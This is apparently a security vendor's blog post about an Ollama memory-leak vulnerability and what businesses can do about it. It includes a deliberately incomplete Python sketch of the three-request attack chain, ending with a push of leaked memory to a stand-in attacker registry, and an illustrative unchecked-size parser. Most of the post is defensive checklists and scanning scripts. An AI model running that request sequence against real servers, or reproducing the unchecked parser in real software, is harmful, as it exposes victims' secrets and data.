Bleeding Llama: 300,000 'Private' AI Servers at Risk

By Yonatan Hoorizadeh, CISO — CISSP, CISM, CRISC, AAISM
Published: May 14, 2026
Last updated: May 14, 2026
When a small business or mid-market company says “we run our AI locally for privacy reasons,” they almost always mean Ollama. It’s the most widely used framework for hosting open-source models on your own hardware — over 100 million Docker Hub downloads, roughly 171,000 GitHub stars, and quiet adoption inside enterprise networks where teams want to keep their prompts and data out of someone else’s cloud.
A critical vulnerability disclosed this week, codenamed Bleeding Llama (CVE-2026-7482), has flipped that assumption. Researchers at Cyera found that an attacker can extract the entire memory of an exposed Ollama server — including API keys, system prompts, customer conversations, and proprietary code — with three unauthenticated API calls. They estimate roughly 300,000 servers are currently reachable on the public internet.
What actually happened
Bleeding Llama is a heap out-of-bounds read in the way Ollama loads model files. Ollama supports a format called GGUF, used to package model weights and metadata for local inference. When a user uploads a GGUF file to the /api/create endpoint, Ollama parses the tensor sizes declared inside it. If those declared sizes are larger than what the file actually contains, the server reads past the end of its memory buffer and copies whatever happens to be sitting next to it on the heap.
That neighboring memory is exactly the kind of thing a defender does not want shared: environment variables, plaintext API keys, user prompts, system prompts from other running models, conversation history, and any data the model has recently processed. The leaked bytes get wrapped into a new model artifact, which the attacker then pushes to a registry they control — quietly carrying the stolen memory out the door.
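To make the bug class concrete, here is a minimal sketch of the vulnerable pattern. This is illustrative Python, not Ollama's actual code; Python slicing silently truncates rather than over-reading, so the comments note what the equivalent lower-level copy would do.

def read_tensor(data: bytes, offset: int, declared_size: int) -> bytes:
    # VULNERABLE pattern: trust the tensor size declared in the file header.
    # In a lower-level runtime, copying offset..offset+declared_size runs
    # past the real buffer and picks up adjacent heap contents.
    return data[offset : offset + declared_size]

def read_tensor_fixed(data: bytes, offset: int, declared_size: int) -> bytes:
    # FIXED pattern: validate the declared size against what the file
    # actually contains before copying anything.
    if offset + declared_size > len(data):
        raise ValueError("declared tensor size exceeds file length")
    return data[offset : offset + declared_size]

The missing bounds check is the whole story: the parser believed a size field supplied by the attacker.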
The bug carries a CVSS score of 9.1 and is fixed in Ollama version 0.17.1. Anything earlier than that is vulnerable.
Why this matters for a business
If your engineering team or data scientists are running Ollama anywhere — even on what they consider an “internal” server — there are specific business risks to take seriously.
The first is credential theft. Ollama processes typically run with environment variables set by the developer or infrastructure team. Those variables often include API keys for cloud providers, tokens for SaaS platforms, database credentials, and keys for third-party services the model is wired into. Cyera’s researchers note that “an attacker can learn basically anything about the organization from your AI inference.” A compromised Ollama server is, in practice, a compromised set of cloud credentials.
The second is data exposure. Anything an employee has typed into the local LLM — customer contracts, source code, regulated data like PHI or PII, internal strategy documents — is in process memory and reachable through this bug. For regulated industries, that is a reportable data-breach event under most state privacy laws and HIPAA, and a direct problem for SOC 2 attestations.
The third is integration blast radius. Engineers increasingly connect Ollama to coding assistants and Model Context Protocol (MCP) bridges. When that happens, every output flowing through those tools also passes through Ollama’s memory. The exposure compounds quickly.
How the attack works
The exploit chain is three API calls, sketched after this list, and requires no credentials at all:
1. The attacker uploads a malicious GGUF file via Ollama’s blob endpoint. The file declares a tensor far larger than its actual contents.
2. The attacker calls /api/create. During quantization, Ollama reads past the buffer boundary and stitches adjacent heap memory into the new model.
3. The attacker calls /api/push to send the resulting model — now carrying stolen bytes — to a registry under their control.
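In terms of Ollama's public REST API, the sequence maps onto three documented endpoints. The sketch below is deliberately incomplete: the malicious GGUF payload is replaced with a placeholder and the request bodies are abbreviated, so it illustrates the attack surface rather than reproducing the exploit.

import hashlib
import requests

OLLAMA = "http://127.0.0.1:11434"      # hypothetical target
gguf_bytes = b"GGUF placeholder"       # stand-in; exploit payload omitted
digest = "sha256:" + hashlib.sha256(gguf_bytes).hexdigest()

# 1. Stage the file via the blob endpoint, addressed by SHA-256 digest.
requests.post(f"{OLLAMA}/api/blobs/{digest}", data=gguf_bytes)

# 2. Build a model from the blob. Parsing/quantization is where the
#    out-of-bounds read stitches heap memory into the new model.
#    (Body abbreviated; see Ollama's /api/create documentation.)
requests.post(f"{OLLAMA}/api/create",
              json={"model": "exfil", "files": {"oob.gguf": digest}})

# 3. Push the model, and the leaked bytes inside it, to a registry the
#    attacker controls.
requests.post(f"{OLLAMA}/api/push", json={"model": "attacker.example/exfil"})

Notice that nothing in this sequence presents a credential. The only precondition is network reachability of port 11434.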
The reason this works at all is that Ollama’s REST API ships without authentication. The default network binding is loopback (127.0.0.1), but Ollama’s own documentation recommends OLLAMA_HOST=0.0.0.0 for any setup where the model should be reachable from another machine, and that’s a common pattern in containerized deployments, Kubernetes clusters, and shared dev environments. Once port 11434 is reachable from beyond the host, the API is effectively an unauthenticated admin panel.
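A quick way to test whether a given host is in scope: Ollama's version endpoint answers without authentication, which itself demonstrates the problem. A minimal probe follows; the naive version comparison is illustrative and will flag pre-release version strings as unrecognized.

import sys
import requests

def check(host: str, port: int = 11434) -> None:
    # Probe Ollama's unauthenticated version endpoint.
    try:
        r = requests.get(f"http://{host}:{port}/api/version", timeout=3)
        version = r.json().get("version", "unknown")
    except requests.RequestException:
        print(f"{host}:{port}: not reachable or not Ollama")
        return
    try:
        # Naive x.y.z comparison against the fixed release, 0.17.1.
        patched = tuple(int(p) for p in version.split(".")) >= (0, 17, 1)
        status = "patched" if patched else "VULNERABLE to CVE-2026-7482"
    except ValueError:
        status = "unrecognized version format"
    print(f"{host}:{port}: Ollama {version} -> {status}")

if __name__ == "__main__":
    check(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1")

If that request succeeds from a machine that has no business talking to the model, the binding is too broad.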
The disclosure gap that left defenders blind
This is the part most likely to bite organizations that thought they were patched.
Cyera reported the vulnerability to Ollama on February 2, 2026. A fix shipped in version 0.17.1 on February 25 — but the release notes did not flag it as a security update. Cyera filed a CVE request with MITRE on March 2 and got no response. After follow-ups in March and April, the researcher escalated to a third-party CNA called Echo on April 26, which finally assigned CVE-2026-7482 on April 28.
For more than two months, organizations running vulnerable Ollama versions had no CVE number, no signal from their vulnerability scanners, and no urgency cue in any patch-management tool. The fix was in the changelog, but it looked like any other minor update. Many teams skipped it.
This is a problem we see often in conversations with clients: vulnerability management programs are built around CVE feeds, and a patch that isn’t tagged with a CVE is effectively invisible. For AI tooling — much of which evolves outside the traditional CVE process — this gap is a recurring issue.
The shadow AI problem this exposes
Here is the harder question for most business leaders: do you actually know where Ollama is running in your environment?
A common pattern looks like this. A data team wants to experiment with an open-source LLM without sending prompts to a third party. They spin up Ollama on a workstation, a small cloud VM, or a Kubernetes pod. It works. They tell a colleague. Someone else deploys their own. Six months later, the organization has half a dozen Ollama instances spread across personal laptops, AWS accounts, and the corporate dev cluster — none of them on the official inventory, none of them in the vulnerability-management program, several of them inadvertently exposed to the internet.
This is what we mean by shadow AI. It looks like shadow IT, but the stakes are higher because each shadow instance is a tunnel into prompts, secrets, and integrations that the cybersecurity team doesn’t know exist. Bleeding Llama is the kind of disclosure where shadow AI bites hardest — the patch exists, but the patch can’t help you if nobody owns the asset.
If you don’t already have an AI inventory, this is the cue to start one. A focused fractional CISO or vCISO engagement can stand up an AI inventory and exposure assessment in days, not months — and frame it in terms an executive team can act on.
What to do this week
If your organization uses Ollama, or might, here is a tight checklist worth running now:
Find it. Scan internal and cloud environments for Ollama installations. Look for processes listening on port 11434 and for Docker images containing Ollama. Ask engineering teams directly — shadow AI rarely shows up in asset databases. (A subnet-sweep sketch follows this checklist.)
Upgrade. Move every Ollama instance to version 0.17.1 or later. Verify with “ollama --version”. Anything older than 0.17.1 is exposed.
Check the binding. Any Ollama instance configured with OLLAMA_HOST=0.0.0.0 should be assumed reachable from someone, somewhere. Restrict to loopback or to a specific private subnet behind a firewall.
Assume compromise if it was internet-facing. If any instance was reachable from the public internet before patching, treat it as compromised. Rotate every API key, token, and credential that was present in its environment variables — cloud keys, SaaS tokens, database passwords, third-party API keys. Do not skip this step on the assumption that “we didn’t see anything.” The attack leaves no obvious traces in standard logs.
Put authentication in front. Deploy an authentication proxy or API gateway in front of every Ollama instance that needs to be reachable beyond localhost. The native REST API ships without authentication by design, so the control has to live in front of it.
Pull AI tooling into vulnerability management. Ollama, vector databases, MCP servers, and other AI infrastructure components belong in the same patch cadence and CVE-watch process as your operating systems and web servers. The Bleeding Llama disclosure gap is a lesson in why “we follow CVEs” is no longer sufficient on its own.
Windows users, read the small print. Researchers at Striga disclosed two additional Ollama vulnerabilities (CVE-2026-42248 and CVE-2026-42249) affecting the Windows updater. Both remained unpatched when the coordinated-disclosure window elapsed. Affected versions are 0.12.10 through 0.22.0. Until fixes ship, disable auto-update and remove any Ollama shortcut from the Windows Startup folder.
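For the discovery step, a rough stdlib-only sweep of an internal range can surface candidates; the CIDR below is a placeholder, and any hit should be confirmed with the version probe shown earlier.

import ipaddress
import socket

def sweep(cidr: str, port: int = 11434, timeout: float = 0.5) -> list[str]:
    # Try a TCP connect to Ollama's default port on every host in the range.
    hits = []
    for ip in ipaddress.ip_network(cidr, strict=False).hosts():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((str(ip), port)) == 0:
                hits.append(str(ip))
    return hits

print(sweep("10.0.0.0/24"))   # hypothetical internal range

A TCP connect on 11434 is only a hint, and instances bound to loopback will never show up in a sweep from another host — which is exactly where you want them.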
Frequently asked questions
Am I exposed if my Ollama server is only reachable on my company’s internal network?
Yes, just less exposed than an internet-facing instance. CVE-2026-7482 doesn't require internet exposure. Any network where an attacker could reach port 11434 is enough, including a shared corporate LAN, a Docker network, or a Kubernetes cluster. If an attacker phishes one workstation, they can pivot to any Ollama instance on the same flat network. Network segmentation and an authentication proxy in front of Ollama are still needed for internal deployments.
What credentials should I rotate if my Ollama instance might have been compromised?
Treat every secret that was reachable from the host as potentially exposed. That includes environment variables set in the process or container (OPENAI_API_KEY, AWS_ACCESS_KEY_ID, database passwords, third-party API tokens), and any credentials embedded in the system prompts of models you ran. Rotate them, then check your cloud provider audit logs and SaaS access logs for unfamiliar activity going back to whenever the instance was first exposed.
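On a Linux host, one way to build that rotation checklist is to read the environment of the running Ollama process directly. This is a hypothetical helper, and it deliberately prints variable names only, never their values.

import re
from pathlib import Path

# Variable names that usually indicate a secret worth rotating.
SECRET_HINT = re.compile(r"KEY|TOKEN|SECRET|PASS", re.IGNORECASE)

for proc in Path("/proc").glob("[0-9]*"):
    try:
        if "ollama" not in (proc / "comm").read_text():
            continue
        entries = (proc / "environ").read_bytes().split(b"\0")
    except OSError:
        continue  # process exited or we lack permission
    for entry in entries:
        name, _, _ = entry.decode(errors="replace").partition("=")
        if SECRET_HINT.search(name):
            print(f"pid {proc.name}: rotate {name}")

For containerized deployments, the equivalent inventory comes from the container spec (for example, docker inspect) rather than /proc.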
Does upgrading to Ollama 0.17.1 close the Windows updater bugs as well?
No. The two Windows-specific flaws (CVE-2026-42248 and CVE-2026-42249) are separate from Bleeding Llama and remain unpatched as of this writing, per CERT Polska’s coordinated disclosure. Affected versions are Ollama for Windows 0.12.10 through 0.22.0. Until a fix ships, the mitigation is to disable auto-update and remove the Ollama shortcut from %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.
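If you script the mitigation across a fleet, the Startup folder path above translates to something like the sketch below. The shortcut filename "Ollama.lnk" is an assumption, so the script lists the folder's contents for review before deleting anything.

import os
from pathlib import Path

startup = (Path(os.environ["APPDATA"]) / "Microsoft" / "Windows"
           / "Start Menu" / "Programs" / "Startup")
for lnk in startup.glob("*.lnk"):
    print("found:", lnk.name)          # review before deleting

shortcut = startup / "Ollama.lnk"      # assumed name; verify from the listing
if shortcut.exists():
    shortcut.unlink()
    print("removed:", shortcut)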
Are other local LLM runtimes affected by similar issues?
Bleeding Llama itself is specific to Ollama’s GGUF loader, but the underlying pattern — local AI tooling shipped without authentication, often bound to all network interfaces, and parsing untrusted file formats — is common across the self-hosted AI ecosystem. Treat any locally hosted inference server as a high-value asset that needs the same network controls, patching cadence, and access management as a database server.
How fast should we be patching AI tooling like this?
Faster than the typical 30-day patch SLA most IT shops use. The window between Cyera’s report and the public CVE was about two months, proof-of-concept code is already public, and 300,000 servers are mapped by public scanners. Treat any unpatched Ollama instance as actively at risk and aim for hours-to-days remediation, not weeks. For organizations without a 24/7 security operations function, this is exactly the kind of pace a fractional CISO or external incident response retainer is designed to support.
Need help getting ahead of shadow AI?
Bleeding Llama is one of many disclosures this year that reward organizations with disciplined AI inventories, segmented networks, and a clear playbook for what to do when a “local” tool turns out not to be. Purple Shield Security helps small and mid-market businesses build that discipline through AI security and vCISO engagements that focus on what’s actually at risk — not theoretical frameworks. If you’re not sure where your AI tooling lives, what’s exposed, or what to rotate after a disclosure like this, we’d be glad to talk.